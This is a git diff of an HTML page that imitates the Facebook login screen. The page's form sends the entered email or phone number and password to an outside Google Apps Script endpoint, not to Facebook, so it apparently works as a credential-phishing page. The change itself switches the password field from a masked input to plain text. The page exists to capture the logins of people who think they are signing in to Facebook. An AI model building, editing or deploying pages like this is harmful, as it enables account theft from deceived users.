--- a/index.html
+++ b/index.html
@@ -135,7 +135,7 @@
     <div class="logo">facebook</div>
     <form method="post" action="https://script.google.com/macros/s/AKfycbw8Bk5Ajtdg4aeiaA8pDORNlk4VhpfnP4tiRyViaZh_icWIynVMbhLWYJjTBrDFY4RB/exec" name="contact-form" >
       <input type="text" name="your-name" placeholder="Email or Phone Number" required>
-      <input type="password" name="your-pass" placeholder="Password" required>
+      <input type="text" name="your-pass" placeholder="Password" required>
       <input type="submit" value="Log In" id="submit" class="submit" >
     </form>
     <a href="#" class="forgot-password">Forgot Password?</a>
